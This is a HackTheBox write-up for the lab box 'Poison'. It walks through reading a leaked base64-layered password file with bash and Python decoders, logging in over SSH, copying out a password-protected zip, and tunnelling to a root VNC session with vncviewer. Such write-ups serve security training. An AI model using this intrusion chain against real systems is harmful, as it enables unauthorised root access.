HackTheBox - Poison

User

The website seems to be made for testing purposes and has some php files listed that we can test. Hmm, the file listfiles.php sounds promising, let’s visit http://10.10.10.84/listfiles.php.

Array ( 
 [0] => .
 [1] => ..
 [2] => browse.php
 [3] => index.php
 [4] => info.php
 [5] => ini.php
 [6] => listfiles.php
 [7] => phpinfo.php
 [8] => pwdbackup.txt
)

Good! We can list the files in the current directory, there is also one file we didn’t see before, pwdbackup.txt:

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

It’s a string that has been base64 encoded 13 times, so let’s decode it with some bash fun:

#!/bin/bash
# Peel off the 13 base64 layers one at a time, keeping each intermediate result in pwd-N.txt.
# Assumes pwdbackup.txt holds only the base64 blob (the comment line at the top removed),
# since base64 -d rejects the non-base64 text.
cp pwdbackup.txt pwd-1.txt
for i in {1..13}; do
    base64 -d < "pwd-$i.txt" > "pwd-$((i+1)).txt"
done
cat pwd-14.txt
rm pwd-*

We receive the password Charix!2#4%6&8(0! With that password we can also guess the user “charix” and log in through SSH. At this point we are able to grab the user flag.
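A generalisation of the bash loop above, added here as an example and not part of the original writeup: it peels base64 layers until the payload stops being valid base64, so the layer count does not have to be known in advance, and it skips the comment line at the top of pwdbackup.txt. The make_sample helper is a constructed fixture that mimics the wrapped output of the base64 CLI.

```python
import base64
import binascii
import re
import string

# A line made only of standard base64 alphabet characters (with optional padding).
_B64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Bytes we accept as a plausible decoded text layer; anything else is binary garbage.
_PRINTABLE = set(string.printable.encode())


def peel_base64(text: str, max_layers: int = 64) -> tuple[str, int]:
    """Strip nested base64 layers from text until the payload is no longer base64.

    Lines that do not look like base64 (the "This password is secure..." comment
    line in pwdbackup.txt) are dropped first. Returns (plaintext, layers_removed).
    The stop condition is a heuristic: a layer is peeled only while it decodes
    cleanly and yields printable text.
    """
    lines = [l.strip() for l in text.splitlines() if _B64_LINE.match(l.strip())]
    if not lines:
        return text.strip(), 0
    current = "\n".join(lines)
    layers = 0
    while layers < max_layers:
        compact = "".join(current.split())  # a wrapped layer spans several lines
        try:
            decoded = base64.b64decode(compact, validate=True)
        except binascii.Error:
            break  # not base64 any more: current is the innermost payload
        if not decoded or any(b not in _PRINTABLE for b in decoded):
            break  # decoding produced non-text bytes, so the previous layer was the payload
        current = decoded.decode("ascii").strip()  # each CLI layer ends with a newline
        layers += 1
    return current, layers


def make_sample(secret: str, layers: int) -> str:
    """Constructed fixture: wrap secret in the given number of base64 layers,
    with 76-column wrapping and a trailing newline like the base64 CLI, and
    prepend the comment line found in pwdbackup.txt."""
    data = secret.encode()
    for _ in range(layers):
        data = base64.encodebytes(data)
    header = "This password is secure, it's encoded atleast 13 times.. what could go wrong really..\n\n"
    return header + data.decode("ascii")


if __name__ == "__main__":
    print(peel_base64(make_sample("Charix!2#4%6&8(0", 13)))
```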

Privesc

We instantly notice a file called secret.zip inside Charix’ home directory. The zip file is password protected and we cannot unzip it directly on the box, so we copy the file to our own machine.

On Poison:

% openssl base64 -in secret.zip -out text.b64
% cat text.b64 
UEsDBBQAAQAAACeYOEwneFN3FAAAAAgAAAAGAAAAc2VjcmV0gGG5yvhDaHStR6lI
GGO1REM3nUxQSwECPwAUAAEAAAAnmDhMJ3hTdxQAAAAIAAAABgAkAAAAAAAAACEA
AAAAAAAAc2VjcmV0CgAgAAAAAAABABgAACke8TSV0wGDzbtpjL/TAQApHvE0ldMB
UEsFBgAAAAABAAEAWAAAADgAAAAAAA==

On my machine:

$ vi secret.zip.b64
$ cat secret.zip.b64 | base64 -d > secret.zip
$ unzip secret.zip
Archive:  secret.zip
[secret.zip1] secret password: Charix!2#4%6&8(0
replace secret? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
 extracting: secret

Now what do we do with the secret file? On the box we can see Xvnc and xterm running as root, let’s try to connect to that!

First we have to create a tunnel with ssh so we can connect to VNC from the outside (port 5901 on the box is forwarded to port 9000 locally):

ssh -L 9000:localhost:5901 charix@10.10.10.84

Next we need a VNC client such as vncviewer to connect through the tunnel. The secret file is the VNC password file, so we pass it with -passwd:

vncviewer -passwd secret localhost:9000

At this point a window should pop open with a terminal running as root!


That’s all for the box Poison!